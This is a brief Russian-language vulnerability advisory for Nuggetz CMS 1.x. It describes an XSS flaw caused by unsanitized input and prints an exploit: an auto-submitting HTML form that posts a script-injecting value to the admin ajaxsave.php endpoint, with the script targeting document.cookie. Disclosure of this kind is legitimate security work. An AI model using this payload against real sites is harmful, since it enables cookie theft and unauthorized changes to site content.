Программа: Nuggetz CMS 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form action="http://example.com/nuggetz/admin/ajaxsave.php?nugget=nuggetnamefromclass&dummy=1"
method="post" name="main" >
<input name="pagevalue" type="hidden" value='page content"><script>alert(document.cookie)</script>'
/>
</form>
<script>
document.main.submit();
</script>



Оставить мнение